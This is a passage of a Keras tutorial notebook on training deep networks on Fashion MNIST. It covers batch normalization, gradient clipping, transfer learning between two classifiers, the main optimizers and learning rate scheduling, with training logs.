\n_________________________________________________________________\ndense_214 (Dense) (None, 10) 1010 \n=================================================================\nTotal params: 271,346\nTrainable params: 268,978\nNon-trainable params: 2,368\n_________________________________________________________________\n" ], [ "bn1 = model.layers[1]\n[(var.name, var.trainable) for var in bn1.variables]", "_____no_output_____" ], [ "#bn1.updates #deprecated", "_____no_output_____" ], [ "model.compile(loss=\"sparse_categorical_crossentropy\",\n optimizer=keras.optimizers.SGD(learning_rate1e-3),\n metrics=[\"accuracy\"])", "_____no_output_____" ], [ "history = model.fit(X_train, y_train, epochs=10,\n validation_data=(X_valid, y_valid))", "Epoch 1/10\n1719/1719 [==============================] - 3s 1ms/step - loss: 1.2287 - accuracy: 0.5993 - val_loss: 0.5526 - val_accuracy: 0.8230\nEpoch 2/10\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.5996 - accuracy: 0.7959 - val_loss: 0.4725 - val_accuracy: 0.8468\nEpoch 3/10\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.5312 - accuracy: 0.8168 - val_loss: 0.4375 - val_accuracy: 0.8558\nEpoch 4/10\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.4884 - accuracy: 0.8294 - val_loss: 0.4153 - val_accuracy: 0.8596\nEpoch 5/10\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.4717 - accuracy: 0.8343 - val_loss: 0.3997 - val_accuracy: 0.8640\nEpoch 6/10\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.4420 - accuracy: 0.8461 - val_loss: 0.3867 - val_accuracy: 0.8694\nEpoch 7/10\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.4285 - accuracy: 0.8496 - val_loss: 0.3763 - val_accuracy: 0.8710\nEpoch 8/10\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.4086 - accuracy: 0.8552 - val_loss: 0.3711 - val_accuracy: 0.8740\nEpoch 9/10\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.4079 - accuracy: 0.8566 - val_loss: 0.3631 - val_accuracy: 0.8752\nEpoch 10/10\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.3903 - accuracy: 0.8617 - val_loss: 0.3573 - val_accuracy: 0.8750\n" ] ], [ [ "Sometimes applying BN before the activation function works better (there's a debate on this topic). Moreover, the layer before a `BatchNormalization` layer does not need to have bias terms, since the `BatchNormalization` layer some as well, it would be a waste of parameters, so you can set `use_bias=False` when creating those layers:", "_____no_output_____" ] ], [ [ "model = keras.models.Sequential([\n keras.layers.Flatten(input_shape=[28, 28]),\n keras.layers.BatchNormalization(),\n keras.layers.Dense(300, use_bias=False),\n keras.layers.BatchNormalization(),\n keras.layers.Activation(\"relu\"),\n keras.layers.Dense(100, use_bias=False),\n keras.layers.BatchNormalization(),\n keras.layers.Activation(\"relu\"),\n keras.layers.Dense(10, activation=\"softmax\")\n])", "_____no_output_____" ], [ "model.compile(loss=\"sparse_categorical_crossentropy\",\n optimizer=keras.optimizers.SGD(learning_rate=1e-3),\n metrics=[\"accuracy\"])", "_____no_output_____" ], [ "history = model.fit(X_train, y_train, epochs=10,\n validation_data=(X_valid, y_valid))", "Epoch 1/10\n1719/1719 [==============================] - 3s 1ms/step - loss: 1.3677 - accuracy: 0.5604 - val_loss: 0.6767 - val_accuracy: 0.7812\nEpoch 2/10\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.7136 - accuracy: 0.7702 - val_loss: 0.5566 - val_accuracy: 0.8184\nEpoch 3/10\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.6123 - accuracy: 0.7990 - val_loss: 0.5007 - val_accuracy: 0.8360\nEpoch 4/10\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.5547 - accuracy: 0.8148 - val_loss: 0.4666 - val_accuracy: 0.8448\nEpoch 5/10\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.5255 - accuracy: 0.8230 - val_loss: 0.4434 - val_accuracy: 0.8534\nEpoch 6/10\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.4947 - accuracy: 0.8328 - val_loss: 0.4263 - val_accuracy: 0.8550\nEpoch 7/10\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.4736 - accuracy: 0.8385 - val_loss: 0.4130 - val_accuracy: 0.8566\nEpoch 8/10\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.4550 - accuracy: 0.8446 - val_loss: 0.4035 - val_accuracy: 0.8612\nEpoch 9/10\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.4495 - accuracy: 0.8440 - val_loss: 0.3943 - val_accuracy: 0.8638\nEpoch 10/10\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.4333 - accuracy: 0.8494 - val_loss: 0.3875 - val_accuracy: 0.8660\n" ] ], [ [ "## Gradient Clipping", "_____no_output_____" ], [ "All Keras optimizers accept `clipnorm` or `clipvalue` arguments:", "_____no_output_____" ] ], [ [ "optimizer = keras.optimizers.SGD(clipvalue=1.0)", "_____no_output_____" ], [ "optimizer = keras.optimizers.SGD(clipnorm=1.0)", "_____no_output_____" ] ], [ [ "## Reusing Pretrained Layers", "_____no_output_____" ], [ "### Reusing a Keras model", "_____no_output_____" ], [ "Let's split the fashion MNIST training set in two:\n* `X_train_A`: all images of all items except for sandals and shirts (classes 5 and 6).\n* `X_train_B`: a much smaller training set of just the first 200 images of sandals or shirts.\n\nThe validation set and the test set are also split this way, but without restricting the number of images.\n\nWe will train a model on set A (classification task with 8 classes), and try to reuse it to tackle set B (binary classification). We hope to transfer a little bit of knowledge from task A to task B, since classes in set A (sneakers, ankle boots, coats, t-shirts, etc.) are somewhat similar to classes in set B (sandals and shirts). However, since we are using `Dense` layers, only patterns that occur at the same location can be reused (in contrast, convolutional layers will transfer much better, since learned patterns can be detected anywhere on the image, as we will see in the CNN chapter).", "_____no_output_____" ] ], [ [ "def split_dataset(X, y):\n y_5_or_6 = (y == 5) | (y == 6) # sandals or shirts\n y_A = y[~y_5_or_6]\n y_A[y_A > 6] -= 2 # class indices 7, 8, 9 should be moved to 5, 6, 7\n y_B = (y[y_5_or_6] == 6).astype(np.float32) # binary classification task: is it a shirt (class 6)?\n return ((X[~y_5_or_6], y_A),\n (X[y_5_or_6], y_B))\n\n(X_train_A, y_train_A), (X_train_B, y_train_B) = split_dataset(X_train, y_train)\n(X_valid_A, y_valid_A), (X_valid_B, y_valid_B) = split_dataset(X_valid, y_valid)\n(X_test_A, y_test_A), (X_test_B, y_test_B) = split_dataset(X_test, y_test)\nX_train_B = X_train_B[:200]\ny_train_B = y_train_B[:200]", "_____no_output_____" ], [ "X_train_A.shape", "_____no_output_____" ], [ "X_train_B.shape", "_____no_output_____" ], [ "y_train_A[:30]", "_____no_output_____" ], [ "y_train_B[:30]", "_____no_output_____" ], [ "tf.random.set_seed(42)\nnp.random.seed(42)", "_____no_output_____" ], [ "model_A = keras.models.Sequential()\nmodel_A.add(keras.layers.Flatten(input_shape=[28, 28]))\nfor n_hidden in (300, 100, 50, 50, 50):\n model_A.add(keras.layers.Dense(n_hidden, activation=\"selu\"))\nmodel_A.add(keras.layers.Dense(8, activation=\"softmax\"))", "_____no_output_____" ], [ "model_A.compile(loss=\"sparse_categorical_crossentropy\",\n optimizer=keras.optimizers.SGD(learning_rate=1e-3),\n metrics=[\"accuracy\"])", "_____no_output_____" ], [ "history = model_A.fit(X_train_A, y_train_A, epochs=20,\n validation_data=(X_valid_A, y_valid_A))", "Epoch 1/20\n1375/1375 [==============================] - 2s 1ms/step - loss: 0.9249 - accuracy: 0.6994 - val_loss: 0.3896 - val_accuracy: 0.8662\nEpoch 2/20\n1375/1375 [==============================] - 2s 1ms/step - loss: 0.3651 - accuracy: 0.8745 - val_loss: 0.3288 - val_accuracy: 0.8827\nEpoch 3/20\n1375/1375 [==============================] - 1s 1ms/step - loss: 0.3182 - accuracy: 0.8897 - val_loss: 0.3013 - val_accuracy: 0.8991\nEpoch 4/20\n1375/1375 [==============================] - 1s 1ms/step - loss: 0.3048 - accuracy: 0.8954 - val_loss: 0.2896 - val_accuracy: 0.9021\nEpoch 5/20\n1375/1375 [==============================] - 1s 1ms/step - loss: 0.2804 - accuracy: 0.9029 - val_loss: 0.2773 - val_accuracy: 0.9061\nEpoch 6/20\n1375/1375 [==============================] - 1s 1ms/step - loss: 0.2701 - accuracy: 0.9075 - val_loss: 0.2735 - val_accuracy: 0.9066\nEpoch 7/20\n1375/1375 [==============================] - 1s 1ms/step - loss: 0.2627 - accuracy: 0.9093 - val_loss: 0.2721 - val_accuracy: 0.9081\nEpoch 8/20\n1375/1375 [==============================] - 1s 1ms/step - loss: 0.2609 - accuracy: 0.9122 - val_loss: 0.2589 - val_accuracy: 0.9141\nEpoch 9/20\n1375/1375 [==============================] - 1s 1ms/step - loss: 0.2558 - accuracy: 0.9110 - val_loss: 0.2562 - val_accuracy: 0.9136\nEpoch 10/20\n1375/1375 [==============================] - 1s 1ms/step - loss: 0.2512 - accuracy: 0.9138 - val_loss: 0.2544 - val_accuracy: 0.9160\nEpoch 11/20\n1375/1375 [==============================] - 1s 1ms/step - loss: 0.2431 - accuracy: 0.9170 - val_loss: 0.2495 - val_accuracy: 0.9153\nEpoch 12/20\n1375/1375 [==============================] - 1s 1ms/step - loss: 0.2422 - accuracy: 0.9168 - val_loss: 0.2515 - val_accuracy: 0.9126\nEpoch 13/20\n1375/1375 [==============================] - 1s 1ms/step - loss: 0.2360 - accuracy: 0.9181 - val_loss: 0.2446 - val_accuracy: 0.9160\nEpoch 14/20\n1375/1375 [==============================] - 1s 1ms/step - loss: 0.2266 - accuracy: 0.9232 - val_loss: 0.2415 - val_accuracy: 0.9178\nEpoch 15/20\n1375/1375 [==============================] - 1s 1ms/step - loss: 0.2225 - accuracy: 0.9239 - val_loss: 0.2447 - val_accuracy: 0.9195\nEpoch 16/20\n1375/1375 [==============================] - 1s 1ms/step - loss: 0.2261 - accuracy: 0.9216 - val_loss: 0.2384 - val_accuracy: 0.9198\nEpoch 17/20\n1375/1375 [==============================] - 1s 1ms/step - loss: 0.2191 - accuracy: 0.9251 - val_loss: 0.2412 - val_accuracy: 0.9175\nEpoch 18/20\n1375/1375 [==============================] - 1s 1ms/step - loss: 0.2171 - accuracy: 0.9254 - val_loss: 0.2429 - val_accuracy: 0.9158\nEpoch 19/20\n1375/1375 [==============================] - 1s 1ms/step - loss: 0.2180 - accuracy: 0.9252 - val_loss: 0.2330 - val_accuracy: 0.9205\nEpoch 20/20\n1375/1375 [==============================] - 1s 1ms/step - loss: 0.2112 - accuracy: 0.9274 - val_loss: 0.2333 - val_accuracy: 0.9200\n" ], [ "model_A.save(\"my_model_A.h5\")", "_____no_output_____" ], [ "model_B = keras.models.Sequential()\nmodel_B.add(keras.layers.Flatten(input_shape=[28, 28]))\nfor n_hidden in (300, 100, 50, 50, 50):\n model_B.add(keras.layers.Dense(n_hidden, activation=\"selu\"))\nmodel_B.add(keras.layers.Dense(1, activation=\"sigmoid\"))", "_____no_output_____" ], [ "model_B.compile(loss=\"binary_crossentropy\",\n optimizer=keras.optimizers.SGD(learning_rate=1e-3),\n metrics=[\"accuracy\"])", "_____no_output_____" ], [ "history = model_B.fit(X_train_B, y_train_B, epochs=20,\n validation_data=(X_valid_B, y_valid_B))", "Epoch 1/20\n7/7 [==============================] - 0s 30ms/step - loss: 1.0360 - accuracy: 0.4975 - val_loss: 0.6314 - val_accuracy: 0.6004\nEpoch 2/20\n7/7 [==============================] - 0s 9ms/step - loss: 0.5883 - accuracy: 0.6971 - val_loss: 0.4784 - val_accuracy: 0.8529\nEpoch 3/20\n7/7 [==============================] - 0s 10ms/step - loss: 0.4380 - accuracy: 0.8854 - val_loss: 0.4102 - val_accuracy: 0.8945\nEpoch 4/20\n7/7 [==============================] - 0s 11ms/step - loss: 0.4021 - accuracy: 0.8712 - val_loss: 0.3647 - val_accuracy: 0.9178\nEpoch 5/20\n7/7 [==============================] - 0s 11ms/step - loss: 0.3361 - accuracy: 0.9348 - val_loss: 0.3300 - val_accuracy: 0.9320\nEpoch 6/20\n7/7 [==============================] - 0s 10ms/step - loss: 0.3113 - accuracy: 0.9233 - val_loss: 0.3019 - val_accuracy: 0.9402\nEpoch 7/20\n7/7 [==============================] - 0s 11ms/step - loss: 0.2817 - accuracy: 0.9299 - val_loss: 0.2804 - val_accuracy: 0.9422\nEpoch 8/20\n7/7 [==============================] - 0s 11ms/step - loss: 0.2632 - accuracy: 0.9379 - val_loss: 0.2606 - val_accuracy: 0.9473\nEpoch 9/20\n7/7 [==============================] - 0s 11ms/step - loss: 0.2373 - accuracy: 0.9481 - val_loss: 0.2428 - val_accuracy: 0.9523\nEpoch 10/20\n7/7 [==============================] - 0s 11ms/step - loss: 0.2229 - accuracy: 0.9657 - val_loss: 0.2281 - val_accuracy: 0.9544\nEpoch 11/20\n7/7 [==============================] - 0s 11ms/step - loss: 0.2155 - accuracy: 0.9590 - val_loss: 0.2150 - val_accuracy: 0.9584\nEpoch 12/20\n7/7 [==============================] - 0s 11ms/step - loss: 0.1834 - accuracy: 0.9738 - val_loss: 0.2036 - val_accuracy: 0.9584\nEpoch 13/20\n7/7 [==============================] - 0s 10ms/step - loss: 0.1671 - accuracy: 0.9828 - val_loss: 0.1931 - val_accuracy: 0.9615\nEpoch 14/20\n7/7 [==============================] - 0s 11ms/step - loss: 0.1527 - accuracy: 0.9915 - val_loss: 0.1838 - val_accuracy: 0.9635\nEpoch 15/20\n7/7 [==============================] - 0s 10ms/step - loss: 0.1595 - accuracy: 0.9904 - val_loss: 0.1746 - val_accuracy: 0.9686\nEpoch 16/20\n7/7 [==============================] - 0s 10ms/step - loss: 0.1473 - accuracy: 0.9937 - val_loss: 0.1674 - val_accuracy: 0.9686\nEpoch 17/20\n7/7 [==============================] - 0s 10ms/step - loss: 0.1412 - accuracy: 0.9944 - val_loss: 0.1604 - val_accuracy: 0.9706\nEpoch 18/20\n7/7 [==============================] - 0s 10ms/step - loss: 0.1242 - accuracy: 0.9931 - val_loss: 0.1539 - val_accuracy: 0.9706\nEpoch 19/20\n7/7 [==============================] - 0s 10ms/step - loss: 0.1224 - accuracy: 0.9931 - val_loss: 0.1482 - val_accuracy: 0.9716\nEpoch 20/20\n7/7 [==============================] - 0s 10ms/step - loss: 0.1096 - accuracy: 0.9912 - val_loss: 0.1431 - val_accuracy: 0.9716\n" ], [ "model_B.summary()", "Model: \"sequential_7\"\n_________________________________________________________________\nLayer (type) Output Shape Param # \n=================================================================\nflatten_7 (Flatten) (None, 784) 0 \n_________________________________________________________________\ndense_224 (Dense) (None, 300) 235500 \n_________________________________________________________________\ndense_225 (Dense) (None, 100) 30100 \n_________________________________________________________________\ndense_226 (Dense) (None, 50) 5050 \n_________________________________________________________________\ndense_227 (Dense) (None, 50) 2550 \n_________________________________________________________________\ndense_228 (Dense) (None, 50) 2550 \n_________________________________________________________________\ndense_229 (Dense) (None, 1) 51 \n=================================================================\nTotal params: 275,801\nTrainable params: 275,801\nNon-trainable params: 0\n_________________________________________________________________\n" ], [ "model_A = keras.models.load_model(\"my_model_A.h5\")\nmodel_B_on_A = keras.models.Sequential(model_A.layers[:-1])\nmodel_B_on_A.add(keras.layers.Dense(1, activation=\"sigmoid\"))", "_____no_output_____" ], [ "model_A_clone = keras.models.clone_model(model_A)\nmodel_A_clone.set_weights(model_A.get_weights())", "_____no_output_____" ], [ "for layer in model_B_on_A.layers[:-1]:\n layer.trainable = False\n\nmodel_B_on_A.compile(loss=\"binary_crossentropy\",\n optimizer=keras.optimizers.SGD(learning_rate=1e-3),\n metrics=[\"accuracy\"])", "_____no_output_____" ], [ "history = model_B_on_A.fit(X_train_B, y_train_B, epochs=4,\n validation_data=(X_valid_B, y_valid_B))\n\nfor layer in model_B_on_A.layers[:-1]:\n layer.trainable = True\n\nmodel_B_on_A.compile(loss=\"binary_crossentropy\",\n optimizer=keras.optimizers.SGD(learning_rate=1e-3),\n metrics=[\"accuracy\"])\nhistory = model_B_on_A.fit(X_train_B, y_train_B, epochs=16,\n validation_data=(X_valid_B, y_valid_B))", "Epoch 1/4\n7/7 [==============================] - 1s 83ms/step - loss: 0.6155 - accuracy: 0.6184 - val_loss: 0.5843 - val_accuracy: 0.6329\nEpoch 2/4\n7/7 [==============================] - 0s 9ms/step - loss: 0.5550 - accuracy: 0.6638 - val_loss: 0.5467 - val_accuracy: 0.6805\nEpoch 3/4\n7/7 [==============================] - 0s 8ms/step - loss: 0.4897 - accuracy: 0.7482 - val_loss: 0.5146 - val_accuracy: 0.7089\nEpoch 4/4\n7/7 [==============================] - 0s 8ms/step - loss: 0.4899 - accuracy: 0.7405 - val_loss: 0.4859 - val_accuracy: 0.7323\nEpoch 1/16\n7/7 [==============================] - 0s 28ms/step - loss: 0.4380 - accuracy: 0.7774 - val_loss: 0.3460 - val_accuracy: 0.8661\nEpoch 2/16\n7/7 [==============================] - 0s 9ms/step - loss: 0.2971 - accuracy: 0.9143 - val_loss: 0.2603 - val_accuracy: 0.9310\nEpoch 3/16\n7/7 [==============================] - 0s 9ms/step - loss: 0.2034 - accuracy: 0.9777 - val_loss: 0.2110 - val_accuracy: 0.9554\nEpoch 4/16\n7/7 [==============================] - 0s 9ms/step - loss: 0.1754 - accuracy: 0.9719 - val_loss: 0.1790 - val_accuracy: 0.9696\nEpoch 5/16\n7/7 [==============================] - 0s 9ms/step - loss: 0.1348 - accuracy: 0.9809 - val_loss: 0.1561 - val_accuracy: 0.9757\nEpoch 6/16\n7/7 [==============================] - 0s 9ms/step - loss: 0.1172 - accuracy: 0.9973 - val_loss: 0.1392 - val_accuracy: 0.9797\nEpoch 7/16\n7/7 [==============================] - 0s 9ms/step - loss: 0.1137 - accuracy: 0.9931 - val_loss: 0.1266 - val_accuracy: 0.9838\nEpoch 8/16\n7/7 [==============================] - 0s 9ms/step - loss: 0.1000 - accuracy: 0.9931 - val_loss: 0.1163 - val_accuracy: 0.9858\nEpoch 9/16\n7/7 [==============================] - 0s 9ms/step - loss: 0.0834 - accuracy: 1.0000 - val_loss: 0.1065 - val_accuracy: 0.9888\nEpoch 10/16\n7/7 [==============================] - 0s 9ms/step - loss: 0.0775 - accuracy: 1.0000 - val_loss: 0.0999 - val_accuracy: 0.9899\nEpoch 11/16\n7/7 [==============================] - 0s 9ms/step - loss: 0.0689 - accuracy: 1.0000 - val_loss: 0.0939 - val_accuracy: 0.9899\nEpoch 12/16\n7/7 [==============================] - 0s 9ms/step - loss: 0.0719 - accuracy: 1.0000 - val_loss: 0.0888 - val_accuracy: 0.9899\nEpoch 13/16\n7/7 [==============================] - 0s 9ms/step - loss: 0.0565 - accuracy: 1.0000 - val_loss: 0.0839 - val_accuracy: 0.9899\nEpoch 14/16\n7/7 [==============================] - 0s 9ms/step - loss: 0.0494 - accuracy: 1.0000 - val_loss: 0.0802 - val_accuracy: 0.9899\nEpoch 15/16\n7/7 [==============================] - 0s 9ms/step - loss: 0.0544 - accuracy: 1.0000 - val_loss: 0.0768 - val_accuracy: 0.9899\nEpoch 16/16\n7/7 [==============================] - 0s 9ms/step - loss: 0.0472 - accuracy: 1.0000 - val_loss: 0.0738 - val_accuracy: 0.9899\n" ] ], [ [ "So, what's the final verdict?", "_____no_output_____" ] ], [ [ "model_B.evaluate(X_test_B, y_test_B)", "63/63 [==============================] - 0s 723us/step - loss: 0.1408 - accuracy: 0.9705\n" ], [ "model_B_on_A.evaluate(X_test_B, y_test_B)", "63/63 [==============================] - 0s 705us/step - loss: 0.0682 - accuracy: 0.9935\n" ] ], [ [ "Great! We got quite a bit of transfer: the error rate dropped by a factor of 4.5!", "_____no_output_____" ] ], [ [ "(100 - 97.05) / (100 - 99.35)", "_____no_output_____" ] ], [ [ "# Faster Optimizers", "_____no_output_____" ], [ "## Momentum optimization", "_____no_output_____" ] ], [ [ "optimizer = keras.optimizers.SGD(learning_rate=0.001, momentum=0.9)", "_____no_output_____" ] ], [ [ "## Nesterov Accelerated Gradient", "_____no_output_____" ] ], [ [ "optimizer = keras.optimizers.SGD(learning_rate=0.001, momentum=0.9, nesterov=True)", "_____no_output_____" ] ], [ [ "## AdaGrad", "_____no_output_____" ] ], [ [ "optimizer = keras.optimizers.Adagrad(learning_rate=0.001)", "_____no_output_____" ] ], [ [ "## RMSProp", "_____no_output_____" ] ], [ [ "optimizer = keras.optimizers.RMSprop(learning_rate=0.001, rho=0.9)", "_____no_output_____" ] ], [ [ "## Adam Optimization", "_____no_output_____" ] ], [ [ "optimizer = keras.optimizers.Adam(learning_rate=0.001, beta_1=0.9, beta_2=0.999)", "_____no_output_____" ] ], [ [ "## Adamax Optimization", "_____no_output_____" ] ], [ [ "optimizer = keras.optimizers.Adamax(learning_rate=0.001, beta_1=0.9, beta_2=0.999)", "_____no_output_____" ] ], [ [ "## Nadam Optimization", "_____no_output_____" ] ], [ [ "optimizer = keras.optimizers.Nadam(learning_rate=0.001, beta_1=0.9, beta_2=0.999)", "_____no_output_____" ] ], [ [ "## Learning Rate Scheduling", "_____no_output_____" ], [ "### Power Scheduling", "_____no_output_____" ], [ "```lr = lr0 / (1 + steps / s)**c```\n* Keras uses `c=1` and `s = 1 / decay`", "_____no_output_____" ] ], [ [ "optimizer = keras.optimizers.SGD(learning_rate=0.01, decay=1e-4)", "_____no_output_____" ], [ "model = keras.models.Sequential([\n keras.layers.Flatten(input_shape=[28, 28]),\n keras.layers.Dense(300, activation=\"selu\", kernel_initializer=\"lecun_normal\"),\n keras.layers.Dense(100, activation=\"selu\", kernel_initializer=\"lecun_normal\"),\n keras.layers.Dense(10, activation=\"softmax\")\n])\nmodel.compile(loss=\"sparse_categorical_crossentropy\", optimizer=optimizer, metrics=[\"accuracy\"])", "_____no_output_____" ], [ "n_epochs = 25\nhistory = model.fit(X_train_scaled, y_train, epochs=n_epochs,\n validation_data=(X_valid_scaled, y_valid))", "Epoch 1/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.5980 - accuracy: 0.7933 - val_loss: 0.4031 - val_accuracy: 0.8598\nEpoch 2/25\n1719/1719 [==============================] - 2s 954us/step - loss: 0.3829 - accuracy: 0.8636 - val_loss: 0.3714 - val_accuracy: 0.8720\nEpoch 3/25\n1719/1719 [==============================] - 2s 943us/step - loss: 0.3491 - accuracy: 0.8771 - val_loss: 0.3746 - val_accuracy: 0.8738\nEpoch 4/25\n1719/1719 [==============================] - 2s 954us/step - loss: 0.3277 - accuracy: 0.8814 - val_loss: 0.3502 - val_accuracy: 0.8798\nEpoch 5/25\n1719/1719 [==============================] - 2s 934us/step - loss: 0.3172 - accuracy: 0.8856 - val_loss: 0.3453 - val_accuracy: 0.8780\nEpoch 6/25\n1719/1719 [==============================] - 2s 919us/step - loss: 0.2922 - accuracy: 0.8940 - val_loss: 0.3419 - val_accuracy: 0.8820\nEpoch 7/25\n1719/1719 [==============================] - 2s 921us/step - loss: 0.2870 - accuracy: 0.8973 - val_loss: 0.3362 - val_accuracy: 0.8872\nEpoch 8/25\n1719/1719 [==============================] - 2s 925us/step - loss: 0.2720 - accuracy: 0.9032 - val_loss: 0.3415 - val_accuracy: 0.8830\nEpoch 9/25\n1719/1719 [==============================] - 2s 929us/step - loss: 0.2730 - accuracy: 0.9004 - val_loss: 0.3297 - val_accuracy: 0.8864\nEpoch 10/25\n1719/1719 [==============================] - 2s 928us/step - loss: 0.2585 - accuracy: 0.9068 - val_loss: 0.3269 - val_accuracy: 0.8888\nEpoch 11/25\n1719/1719 [==============================] - 2s 932us/step - loss: 0.2529 - accuracy: 0.9100 - val_loss: 0.3280 - val_accuracy: 0.8878\nEpoch 12/25\n1719/1719 [==============================] - 2s 954us/step - loss: 0.2485 - accuracy: 0.9101 - val_loss: 0.3343 - val_accuracy: 0.8822\nEpoch 13/25\n1719/1719 [==============================] - 2s 964us/step - loss: 0.2420 - accuracy: 0.9148 - val_loss: 0.3266 - val_accuracy: 0.8890\nEpoch 14/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.2373 - accuracy: 0.9144 - val_loss: 0.3299 - val_accuracy: 0.8890\nEpoch 15/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.2363 - accuracy: 0.9154 - val_loss: 0.3255 - val_accuracy: 0.8874\nEpoch 16/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.2309 - accuracy: 0.9181 - val_loss: 0.3217 - val_accuracy: 0.8910\nEpoch 17/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.2235 - accuracy: 0.9211 - val_loss: 0.3248 - val_accuracy: 0.8914\nEpoch 18/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.2247 - accuracy: 0.9194 - val_loss: 0.3202 - val_accuracy: 0.8934\nEpoch 19/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.2235 - accuracy: 0.9218 - val_loss: 0.3243 - val_accuracy: 0.8906\nEpoch 20/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.2227 - accuracy: 0.9225 - val_loss: 0.3224 - val_accuracy: 0.8900\nEpoch 21/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.2193 - accuracy: 0.9230 - val_loss: 0.3221 - val_accuracy: 0.8912\nEpoch 22/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.2163 - accuracy: 0.9227 - val_loss: 0.3195 - val_accuracy: 0.8948\nEpoch 23/25\n1719/1719 [==============================] - 2s 997us/step - loss: 0.2127 - accuracy: 0.9252 - val_loss: 0.3208 - val_accuracy: 0.8908\nEpoch 24/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.2076 - accuracy: 0.9273 - val_loss: 0.3226 - val_accuracy: 0.8902\nEpoch 25/25\n1719/1719 [==============================] - 2s 999us/step - loss: 0.2104 - accuracy: 0.9250 - val_loss: 0.3225 - val_accuracy: 0.8924\n" ], [ "import math\n\nlearning_rate = 0.01\ndecay = 1e-4\nbatch_size = 32\nn_steps_per_epoch = math.ceil(len(X_train) / batch_size)\nepochs = np.arange(n_epochs)\nlrs = learning_rate / (1 + decay * epochs * n_steps_per_epoch)\n\nplt.plot(epochs, lrs, \"o-\")\nplt.axis([0, n_epochs - 1, 0, 0.01])\nplt.xlabel(\"Epoch\")\nplt.ylabel(\"Learning Rate\")\nplt.title(\"Power Scheduling\", fontsize=14)\nplt.grid(True)\nplt.show()", "_____no_output_____" ] ], [ [ "### Exponential Scheduling", "_____no_output_____" ], [ "```lr = lr0 * 0.1**(epoch / s)```", "_____no_output_____" ] ], [ [ "def exponential_decay_fn(epoch):\n return 0.01 * 0.1**(epoch / 20)", "_____no_output_____" ], [ "def exponential_decay(lr0, s):\n def exponential_decay_fn(epoch):\n return lr0 * 0.1**(epoch / s)\n return exponential_decay_fn\n\nexponential_decay_fn = exponential_decay(lr0=0.01, s=20)", "_____no_output_____" ], [ "model = keras.models.Sequential([\n keras.layers.Flatten(input_shape=[28, 28]),\n keras.layers.Dense(300, activation=\"selu\", kernel_initializer=\"lecun_normal\"),\n keras.layers.Dense(100, activation=\"selu\", kernel_initializer=\"lecun_normal\"),\n keras.layers.Dense(10, activation=\"softmax\")\n])\nmodel.compile(loss=\"sparse_categorical_crossentropy\", optimizer=\"nadam\", metrics=[\"accuracy\"])\nn_epochs = 25", "_____no_output_____" ], [ "lr_scheduler = keras.callbacks.LearningRateScheduler(exponential_decay_fn)\nhistory = model.fit(X_train_scaled, y_train, epochs=n_epochs,\n validation_data=(X_valid_scaled, y_valid),\n callbacks=[lr_scheduler])", "Epoch 1/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 1.1122 - accuracy: 0.7363 - val_loss: 0.8947 - val_accuracy: 0.7496\nEpoch 2/25\n1719/1719 [==============================] - 3s 2ms/step - loss: 0.7354 - accuracy: 0.7825 - val_loss: 0.6059 - val_accuracy: 0.8122\nEpoch 3/25\n1719/1719 [==============================] - 3s 2ms/step - loss: 0.5973 - accuracy: 0.8175 - val_loss: 0.8195 - val_accuracy: 0.7754\nEpoch 4/25\n1719/1719 [==============================] - 3s 2ms/step - loss: 0.6040 - accuracy: 0.8148 - val_loss: 0.6135 - val_accuracy: 0.8398\nEpoch 5/25\n1719/1719 [==============================] - 3s 2ms/step - loss: 0.5462 - accuracy: 0.8323 - val_loss: 0.5075 - val_accuracy: 0.8490\nEpoch 6/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.4479 - accuracy: 0.8555 - val_loss: 0.4538 - val_accuracy: 0.8502\nEpoch 7/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.4225 - accuracy: 0.8622 - val_loss: 0.4792 - val_accuracy: 0.8524\nEpoch 8/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.3873 - accuracy: 0.8678 - val_loss: 0.5517 - val_accuracy: 0.8448\nEpoch 9/25\n1719/1719 [==============================] - 3s 2ms/step - loss: 0.3635 - accuracy: 0.8767 - val_loss: 0.5312 - val_accuracy: 0.8600\nEpoch 10/25\n1719/1719 [==============================] - 3s 2ms/step - loss: 0.3353 - accuracy: 0.8840 - val_loss: 0.4671 - val_accuracy: 0.8660\nEpoch 11/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.3108 - accuracy: 0.8927 - val_loss: 0.4885 - val_accuracy: 0.8670\nEpoch 12/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.2895 - accuracy: 0.8987 - val_loss: 0.4698 - val_accuracy: 0.8636\nEpoch 13/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.2660 - accuracy: 0.9071 - val_loss: 0.4558 - val_accuracy: 0.8820\nEpoch 14/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.2442 - accuracy: 0.9153 - val_loss: 0.4325 - val_accuracy: 0.8774\nEpoch 15/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.2375 - accuracy: 0.9177 - val_loss: 